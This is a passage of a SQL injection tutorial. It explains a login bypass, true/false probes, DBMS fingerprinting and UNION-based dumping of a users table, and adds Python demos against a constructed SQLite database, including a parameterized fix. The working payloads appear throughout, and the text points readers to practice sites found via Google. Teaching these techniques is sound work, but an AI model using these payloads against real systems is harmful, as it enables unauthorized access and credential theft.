Consider a login page whose back end builds a query like the following from the submitted username and password:

Select * from users where username='admin' and password='admin123'

If the attacker knows that the username of the application administrator is admin, he can log in as admin without supplying any password by entering admin'-- as the username, which turns the query into:

Select * from users where username='admin'--' and password='xxx'

Note that the comment sequence (--) causes the rest of the query to be ignored, so the query that is executed is equivalent to:

Select * from users where username='admin'

There are three different kinds of SQL injection possible on web applications.

In-band SQLI: This is also called error-based or union-based SQL injection, or first-order injection. The application is said to be vulnerable to in-band SQLI when the communication between the attacker and the application happens through a single channel, i.e. the attacker uses the same channel to enter the malicious string and to retrieve the data from the database. The application directly displays the retrieved data on its web pages.

The above URL is an in-band SQLI vulnerable practice site. We can find such practice sites from Google. Accessing the URL, the browser displays the home page as shown in Figure 1.

Now let's try to confirm the vulnerability by simply adding a single quote at the end of the URL. The above URL shows an error on the web page saying "Error in your SQL syntax". This is because the extra single quote (') that we entered through the URL was concatenated into the query executed in the background, leaving it with an unbalanced quote. Seeing the error, we can understand that the URL is vulnerable to in-band SQLI. Figure 2 shows the error caused by concatenating the special character (').

If the single quote (') is blocked, we can try appending "or 1=1--" or "and 1=1" to the end of the URL. The above URL then shows the same page that was displayed when accessing the original URL, because the condition we appended is always true.

Now try to access the page by appending "or 1=0--" or "and 1=0--", so that the URL ends in "or 1=0--" or "and 1=0--". This time we are not able to access the page, because the condition "1=0" is always false. Figure 3 shows the page when accessed with the false condition. Seeing the page change between the true and the false condition, we can confirm that the URL is vulnerable to SQLI.

The strings listed in the table below can be used to confirm SQL injection. You can also try, for the string "or a=a", all the combinations that we tried for "or 1=1", with the different comment sequences (#, --, /* and so on).

Moving further, we can extract or dump the complete database using "UNION" and "SELECT" commands. Before that, we need to find out the DBMS type (MS-SQL, MySQL, Oracle), which we can do by calling functions that are unique to each database. For example, each of the above databases has a different syntax for finding the current database user: user_name() in MS-SQL, user() in MySQL, and SELECT user FROM dual in Oracle, so only the probe matching the real back end will run without an error. So let's try to find the DBMS of our SQLI-vulnerable site. As a first trial, I am entering "user_name()" at the place where we had "2".
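The login bypass at the start of this section, as an added example that is not code from the original page: the vulnerable function concatenates the username and password into the query exactly as the page's login query does, so the username admin'-- comments out the password check, while the parameterized version beside it treats the same input as a literal string. The users table and its two accounts are constructed here for the demonstration; SQLite stands in for the page's unnamed database.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the page): an in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "admin123"), ("bob", "hunter2")])
    return conn


def build_query(username, password):
    """The page's query, built by string concatenation. This is the bug."""
    return ("SELECT * FROM users WHERE username='" + username +
            "' AND password='" + password + "'")


def vulnerable_login(conn, username, password):
    """Runs the concatenated query and returns the matched username, or None.

    With username admin'-- the query becomes
    SELECT * FROM users WHERE username='admin'--' AND password='xxx'
    and everything after -- is a comment, so the password is never checked.
    """
    row = conn.execute(build_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same check with bound parameters: the driver passes the values to the
    engine separately from the SQL text, so a quote or -- in the input can
    never change the structure of the query."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(build_query("admin'--", "xxx"))
    print("vulnerable:", vulnerable_login(db, "admin'--", "xxx"))
    print("parameterized:", safe_login(db, "admin'--", "xxx"))
```

The comment sequence works here because SQLite, like MS-SQL, MySQL and Oracle, treats -- as a comment to the end of the line; against MySQL the payload would normally need a space after the dashes (admin'-- ) or use # instead.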
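The confirmation sequence (single quote, true condition, false condition), the DBMS fingerprint with database-specific functions, and the UNION SELECT dump described above, as an added example that is not code from the original page. The vulnerable page, the products and users tables and the id parameter are all constructed here; because the demo back end is SQLite, a fourth probe (sqlite_version()) is added to the page's MS-SQL, MySQL and Oracle functions, and the example shows that the page's first trial, user_name(), fails on anything that is not MS-SQL, which is exactly what makes the probe informative.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the page): a product catalogue the
    page lists by id, plus the users table an attacker would want to dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)",
                     [(1, "Laptop"), (2, "Phone"), (3, "Tablet")])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "admin123"), ("bob", "hunter2")])
    return conn


def vulnerable_page(conn, product_id):
    """Stands in for a page such as product.php?id=2: the id parameter is
    pasted into the query unquoted. Returns ("ok", rows), or ("error", message)
    the way a site that prints the raw database error on the page would."""
    query = "SELECT id, name FROM products WHERE id=" + product_id
    try:
        return ("ok", conn.execute(query).fetchall())
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


def confirm_injection(conn, product_id="2"):
    """The page's three checks: a stray quote must break the query, a true
    condition must leave the page unchanged, a false condition must empty it."""
    baseline = vulnerable_page(conn, product_id)
    quote = vulnerable_page(conn, product_id + "'")
    true_cond = vulnerable_page(conn, product_id + " and 1=1--")
    false_cond = vulnerable_page(conn, product_id + " and 1=0--")
    return {
        "syntax_error": quote[0] == "error",
        "true_unchanged": true_cond == baseline,
        "false_empty": false_cond == ("ok", []),
    }


# One function per DBMS that the others do not have. Only the probe for the
# real back end evaluates without an error, which is what identifies it.
DBMS_PROBES = {
    "MS-SQL": "user_name()",
    "MySQL": "user()",
    "Oracle": "(SELECT user FROM dual)",
    "SQLite": "sqlite_version()",   # added for this demo; the page covers the first three
}


def fingerprint(conn, product_id="2"):
    """Puts each DBMS-specific function in the second UNION column (the slot
    the page fills with user_name()). The first probe that runs names the DBMS
    and its output lands on the page in place of the product name."""
    for dbms, func in DBMS_PROBES.items():
        payload = product_id + " and 1=0 UNION SELECT 1," + func + "--"
        status, rows = vulnerable_page(conn, payload)
        if status == "ok":
            return dbms, rows[0][1]
    return None, None


def dump_users(conn, product_id="2"):
    """Once the column count (2) is known, UNION SELECT pulls any other table
    out through the same page. The false condition blanks the real rows so
    only the injected ones are displayed."""
    payload = product_id + " and 1=0 UNION SELECT username, password FROM users--"
    status, rows = vulnerable_page(conn, payload)
    return rows if status == "ok" else None


if __name__ == "__main__":
    db = make_db()
    print(confirm_injection(db))
    print(fingerprint(db))
    print(dump_users(db))
```

The " and 1=0 UNION SELECT ..." shape keeps the original row out of the result, which matters on pages that only render the first row; the number of columns in the UNION has to match the original query, which is why the page first works out the column positions (the "2" it replaces) before substituting a function into one of them.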